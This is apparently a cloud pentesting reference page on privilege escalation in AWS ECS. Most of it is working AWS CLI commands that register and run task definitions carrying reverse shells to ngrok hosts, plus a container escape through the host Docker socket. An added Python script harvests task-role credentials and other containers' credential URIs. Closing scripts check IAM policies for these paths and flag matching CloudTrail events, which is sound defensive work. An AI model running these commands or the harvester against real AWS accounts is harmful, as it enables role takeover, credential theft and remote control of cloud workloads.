AWS - ECS Privesc


ECS

More information about ECS in:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials (the task role served by the ECS credentials endpoint) and run it.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential Impact: Direct privesc to a different ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can register a new task definition with a malicious container that exfiltrates the metadata credentials and run it. However, in this case a container instance (an EC2 instance registered in the cluster) is needed to run the malicious task definition, because StartTask only places tasks on container instances and does not work with Fargate.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# The container instance must be registered in the given cluster ("default" is used when --cluster is omitted)
aws ecs start-task --cluster <cluster> --task-definition iam_exfiltration \
--container-instances <container_instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential Impact: Direct privesc to any ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials and run it by creating a new service (or updating an existing one) with at least 1 running task.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potential Impact: Direct privesc to any ECS role.

iam:PassRole, (ecs:RunTask|ecs:StartTask)

Actually, with just those permissions (no ecs:RegisterTaskDefinition needed) it is possible to use the overrides parameter of run-task or start-task to attach an arbitrary role to a task launched from an existing task definition and execute arbitrary commands in one of its containers, with something like the following. Note that overrides (including taskRoleArn) only exist on RunTask and StartTask; CreateService and UpdateService do not accept them.

# Reuse an existing task definition, but swap in the role you want and your own command
aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-id>\"]}}"

Potential Impact: Direct privesc to any ECS role.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

This scenario is like the previous ones but without the iam:PassRole permission. It is still interesting because if you can run an arbitrary container, even one without a role, you can run a privileged container (or one that mounts the host's Docker socket) to escape to the node and steal the EC2 instance's IAM role and the roles of the other ECS containers running on that node. You could even force other tasks to run inside the EC2 instance you control to steal their credentials (as discussed in the Privesc to node section).

This attack is only possible if the ECS cluster uses EC2 instances and not Fargate.

# Container definition: reverse shell plus the host's Docker socket mounted inside the container.
# (printf turns the \\\" sequences into \" so the file holds valid JSON; "privileged": true in the
# container definition is the other option if you prefer a privileged container over the socket.)
printf '[
  {
    "name": "exfil_creds",
    "image": "python:latest",
    "entryPoint": ["sh", "-c"],
    "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
    "mountPoints": [
      {
        "readOnly": false,
        "containerPath": "/var/run/docker.sock",
        "sourceVolume": "docker-socket"
      }
    ]
  }
]' > /tmp/task.json

# Host volume backing the mount point above
printf '[
  {
    "name": "docker-socket",
    "host": {
      "sourcePath": "/var/run/docker.sock"
    }
  }
]' > /tmp/volumes.json

# No --task-role-arn, so no iam:PassRole is needed
aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json

# Launch type must be EC2: Fargate tasks cannot mount host paths
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
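What the "malicious container" in the sections above actually does once it has a shell is left implicit. The following Python script is an added example (it is not from the original page and not a HackTricks tool) of the two credential harvests those sections rely on: reading the task's own role from the ECS credentials endpoint via AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, and, when /var/run/docker.sock is mounted as in the task definition above, walking the Docker Engine API to collect the credential URI of every other container on the node (a docker exec into such a container, or a request to the same endpoint with that URI, then yields the other task's role). The endpoint address and env-var name are the documented ECS ones, the Docker API paths are the standard Engine API; all sample values used when testing it are constructed.

```python
"""Added example: harvest ECS credentials from inside a malicious task.

Source 1: the task's own role, served by the ECS agent at
          http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
Source 2: on EC2-backed clusters with /var/run/docker.sock mounted (see the
          task definition above), the credential URI of every other container
          on the node, read from the Docker Engine API.
"""
import http.client
import json
import os
import socket
from typing import Callable, Dict, List, Mapping, Optional

ECS_CREDS_HOST = "169.254.170.2"  # ECS container credentials endpoint
CRED_ENV = "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
DOCKER_SOCK = "/var/run/docker.sock"


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP over a Unix socket, which is how the Docker Engine API is exposed."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self) -> None:
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def http_get(host: str, path: str, unix_sock: Optional[str] = None) -> str:
    """GET over TCP (credentials endpoint) or over the Docker socket when unix_sock is given."""
    conn = UnixHTTPConnection(unix_sock) if unix_sock else http.client.HTTPConnection(host, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"GET {path} -> HTTP {resp.status}")
    return body


def parse_ecs_credentials(body: str) -> Dict[str, str]:
    """Turn the credentials-endpoint JSON into the env vars the AWS CLI reads."""
    data = json.loads(body)
    return {
        "AWS_ACCESS_KEY_ID": data["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": data["SecretAccessKey"],
        "AWS_SESSION_TOKEN": data["Token"],
        "ROLE_ARN": data.get("RoleArn", ""),
        "EXPIRATION": data.get("Expiration", ""),
    }


def own_task_credentials(env: Mapping[str, str] = os.environ,
                         fetch: Callable[[str, str], str] = http_get) -> Optional[Dict[str, str]]:
    """Credentials of the role attached to this task (None when the task has no role)."""
    rel = env.get(CRED_ENV)
    if not rel:
        return None
    return parse_ecs_credentials(fetch(ECS_CREDS_HOST, rel))


def credential_uris_from_inspect(inspect_docs: List[dict]) -> Dict[str, str]:
    """container name -> credential relative URI, from 'docker inspect' style documents."""
    found: Dict[str, str] = {}
    for doc in inspect_docs:
        for entry in doc.get("Config", {}).get("Env") or []:
            key, _, value = entry.partition("=")
            if key == CRED_ENV and value:
                found[doc.get("Name", "?").lstrip("/")] = value
    return found


def node_container_credential_uris(sock_path: str = DOCKER_SOCK) -> Dict[str, str]:
    """List running containers through the mounted socket and collect each task's credential URI."""
    if not os.path.exists(sock_path):
        return {}
    listing = json.loads(http_get("", "/containers/json", unix_sock=sock_path))
    docs = [json.loads(http_get("", f"/containers/{c['Id']}/json", unix_sock=sock_path)) for c in listing]
    return credential_uris_from_inspect(docs)


if __name__ == "__main__":
    # Run inside the exfil_creds container; ship the output back over the reverse shell.
    print(json.dumps({"self": own_task_credentials(), "node": node_container_credential_uris()}, indent=2))
```

The credential URI is the only secret protecting a task's role on the agent endpoint, so collecting the URIs of every container on the node is the cheap step; whether the agent answers for another task's URI from your own container depends on the network mode, while docker exec into the target container (possible once you hold the socket) always works.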

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

An attacker with ecs:ExecuteCommand, ecs:DescribeTasks can execute commands inside a running container and steal the IAM role attached to it (the describe permission is needed because aws ecs execute-command calls DescribeTasks first). However, for this to work the task must have been launched with ECS Exec enabled (enableExecuteCommand, which is off by default and makes ECS inject the SSM agent into the container); the task role also needs the ssmmessages permissions ECS Exec relies on, and the Session Manager plugin must be installed on the machine running the AWS CLI.

So, an attacker could:

  • Try to run a command in every running container

# List enableExecuteCommand on each task (needs jq)
for cluster in $(aws ecs list-clusters | jq -r '.clusterArns[]'); do
  echo "Cluster $cluster"
  for task in $(aws ecs list-tasks --cluster "$cluster" | jq -r '.taskArns[]'); do
    # If true, it's your lucky day
    echo "  Task $task: enableExecuteCommand=$(aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | jq -r '.tasks[0].enableExecuteCommand')"
  done
done

# Execute a shell in a container (needs the Session Manager plugin installed locally)
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
  • If it has ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]

  • If it has ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]

  • If it has ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]

  • If it has ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...] (the already running tasks only pick the setting up once they are replaced, e.g. with --force-new-deployment)

You can find examples of those options in the previous ECS privesc sections.

Potential Impact: Privesc to a different role attached to the containers.
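To turn the permission combinations listed on this page into a quick check against a principal's policy, here is an added example (not from the original page and not a HackTricks tool): a small IAM-style action matcher that handles Allow/Deny, the * and ? wildcards IAM accepts in Action, and NotAction, and then reports which of the ECS privesc paths above a policy document grants. Resource and Condition elements are deliberately ignored, so a hit means "worth checking", not "exploitable"; the sample policy is constructed.

```python
"""Added example: which ECS privesc paths from this page does an IAM policy grant?

Only the Action/NotAction and Effect elements are evaluated. Resource and
Condition are ignored on purpose (a flagged path still needs those checked
by hand), and no role-trust or resource-policy reasoning is attempted.
"""
import fnmatch
from typing import Dict, Iterable, List, Set

# Each path is a list of alternatives; an alternative is the set of actions it needs.
PRIVESC_PATHS: Dict[str, List[Set[str]]] = {
    "passrole+register+run/start": [
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:RunTask"},
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:StartTask"},
    ],
    "passrole+register+service": [
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:CreateService"},
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:UpdateService"},
    ],
    "passrole+run/start overrides": [
        {"iam:PassRole", "ecs:RunTask"},
        {"iam:PassRole", "ecs:StartTask"},
    ],
    "no-passrole node escape": [  # EC2 launch type only
        {"ecs:RegisterTaskDefinition", a}
        for a in ("ecs:RunTask", "ecs:StartTask", "ecs:UpdateService", "ecs:CreateService")
    ],
    "ecs exec": [  # still needs a task with enableExecuteCommand set
        {"ecs:ExecuteCommand", "ecs:DescribeTasks"},
    ],
    "task set": [
        {"ecs:CreateTaskSet", "ecs:UpdateServicePrimaryTaskSet", "ecs:DescribeTaskSets"},
    ],
}


def _as_list(v) -> list:
    """IAM lets Statement, Action and NotAction be a single value or a list."""
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def _matches(patterns: Iterable[str], action: str) -> bool:
    # Action matching is case-insensitive; '*' and '?' are the only wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def is_allowed(policy: dict, action: str) -> bool:
    """Explicit Deny wins over any Allow, as in IAM's evaluation logic."""
    allowed = denied = False
    for st in _as_list(policy.get("Statement")):
        if "Action" in st:
            hit = _matches(_as_list(st["Action"]), action)
        else:  # NotAction applies to every action it does not name
            hit = not _matches(_as_list(st.get("NotAction")), action)
        if not hit:
            continue
        if st.get("Effect") == "Deny":
            denied = True
        elif st.get("Effect") == "Allow":
            allowed = True
    return allowed and not denied


def ecs_privesc_paths(policy: dict) -> Dict[str, List[Set[str]]]:
    """Return every path (and the alternatives within it) whose actions are all allowed."""
    result: Dict[str, List[Set[str]]] = {}
    for name, alternatives in PRIVESC_PATHS.items():
        satisfied = [alt for alt in alternatives if all(is_allowed(policy, a) for a in alt)]
        if satisfied:
            result[name] = satisfied
    return result


# Constructed sample: broad ecs:* plus PassRole, with RunTask explicitly denied.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ecs:*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Deny", "Action": "ecs:RunTask", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for name, alts in ecs_privesc_paths(SAMPLE_POLICY).items():
        print(name, "->", [sorted(a) for a in alts])
```

Feed it the output of aws iam get-policy-version (the "Document" field) or an inline policy; with the sample policy the RunTask alternatives drop out because of the Deny while the StartTask, service and task-set alternatives remain.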

ssm:StartSession

Check in the SSM privesc page how you can abuse this permission to privesc to ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Check in the EC2 privesc page how you can abuse these permissions to privesc to ECS:

AWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Is it possible to register a container instance from a different AWS account so that tasks are run on machines controlled by the attacker??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

TODO: Test this

An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and make it the service's primary task set. This lets the attacker execute arbitrary code inside the service (with its task role). Two caveats: task sets only exist for services that use the EXTERNAL deployment controller (or CODE_DEPLOY through CodeDeploy), so services on the default ECS rolling-update controller are not affected, and the malicious task definition must be registered first, which in practice also requires ecs:RegisterTaskDefinition (plus iam:PassRole if a task role is set on it).

# Register a task definition with a reverse shell (awsvpc network mode, because the task set below uses awsvpcConfiguration)
echo '{
  "family": "malicious-task",
  "networkMode": "awsvpc",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service (the service must use the EXTERNAL deployment controller)
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service (use the taskSetArn returned by create-task-set)
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Potential Impact: Execute arbitrary code in the affected service, which may impact its functionality or exfiltrate sensitive data.
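For the defensive side, an added example (not from the original page and not a HackTricks tool): a CloudTrail triage routine that flags the API calls the techniques on this page produce, such as RegisterTaskDefinition with a docker.sock host volume or a privileged container, RunTask/StartTask carrying an overrides.taskRoleArn, tasks or services enabling ECS Exec, ExecuteCommand sessions and task-set swaps. Field names follow the shape of the ECS API request parameters as CloudTrail records them under requestParameters; the sample records are constructed, and the reverse-shell string match is a heuristic, not a signature.

```python
"""Added example: flag CloudTrail events that match the ECS privesc techniques on this page.

Input: CloudTrail records as dicts (the 'Records' array of a CloudTrail log
file, or one event per line from an Athena/SIEM export).
Output: (eventID, rule, detail) tuples.
"""
import json
from typing import Iterable, List, Tuple

Finding = Tuple[str, str, str]

# Heuristic markers for the reverse-shell one-liners used on this page.
REVSHELL_MARKERS = ("/dev/tcp/", "reverse-shell")


def _register_task_definition_findings(params: dict) -> List[Tuple[str, str]]:
    out: List[Tuple[str, str]] = []
    for vol in params.get("volumes") or []:
        src = (vol.get("host") or {}).get("sourcePath") or ""
        if src.rstrip("/") == "/var/run/docker.sock":
            out.append(("docker-socket-volume", f"volume {vol.get('name')} -> {src}"))
    for cd in params.get("containerDefinitions") or []:
        if cd.get("privileged"):
            out.append(("privileged-container", f"container {cd.get('name')}"))
        cmd = " ".join(cd.get("command") or [])
        if any(m in cmd for m in REVSHELL_MARKERS):
            out.append(("reverse-shell-command", f"container {cd.get('name')}: {cmd[:80]}"))
    return out


def analyse_event(ev: dict) -> List[Finding]:
    """Findings for one CloudTrail record; non-ECS events yield nothing."""
    if ev.get("eventSource") != "ecs.amazonaws.com":
        return []
    eid = ev.get("eventID", "?")
    name = ev.get("eventName")
    p = ev.get("requestParameters") or {}
    findings: List[Finding] = []

    if name == "RegisterTaskDefinition":
        findings += [(eid, rule, detail) for rule, detail in _register_task_definition_findings(p)]
    elif name in ("RunTask", "StartTask"):
        role = (p.get("overrides") or {}).get("taskRoleArn")
        if role:  # the "no RegisterTaskDefinition" variant: role swapped in at launch time
            findings.append((eid, "task-role-override", f"{name} overrides taskRoleArn={role}"))
        if p.get("enableExecuteCommand"):
            findings.append((eid, "ecs-exec-enabled", f"{name} with enableExecuteCommand"))
    elif name in ("CreateService", "UpdateService"):
        if p.get("enableExecuteCommand"):
            svc = p.get("serviceName") or p.get("service")
            findings.append((eid, "ecs-exec-enabled", f"{name} on {svc}"))
    elif name in ("CreateTaskSet", "UpdateServicePrimaryTaskSet"):
        findings.append((eid, "task-set-swap", f"{name} on service {p.get('service')}"))
    elif name == "ExecuteCommand":
        findings.append((eid, "ecs-exec-session", f"command={p.get('command')!r} task={p.get('task')}"))
    return findings


def analyse_records(records: Iterable[dict]) -> List[Finding]:
    out: List[Finding] = []
    for ev in records:
        out.extend(analyse_event(ev))
    return out


# Constructed sample records (field names follow CloudTrail's ECS events).
SAMPLE_RECORDS = [
    {"eventID": "e1", "eventSource": "ecs.amazonaws.com", "eventName": "RegisterTaskDefinition",
     "requestParameters": {
         "family": "iam_exfiltration",
         "volumes": [{"name": "docker-socket", "host": {"sourcePath": "/var/run/docker.sock"}}],
         "containerDefinitions": [{"name": "exfil_creds", "image": "python:latest",
                                   "command": ["/bin/bash -c \"bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\""]}]}},
    {"eventID": "e2", "eventSource": "ecs.amazonaws.com", "eventName": "RunTask",
     "requestParameters": {"taskDefinition": "web:7",
                           "overrides": {"taskRoleArn": "arn:aws:iam::111111111111:role/admin-task-role"}}},
    {"eventID": "e3", "eventSource": "ecs.amazonaws.com", "eventName": "UpdateService",
     "requestParameters": {"service": "api", "enableExecuteCommand": True}},
    {"eventID": "e4", "eventSource": "ecs.amazonaws.com", "eventName": "DescribeTasks",
     "requestParameters": {"tasks": ["arn:aws:ecs:eu-west-1:111111111111:task/API/abc"]}},
]

if __name__ == "__main__":
    for finding in analyse_records(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

The task-role-override rule is the one worth alerting on unconditionally: legitimate deployments set the role in the task definition, so an override at RunTask time almost always means someone is using an existing task definition as a vehicle for a role they could not otherwise assume.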
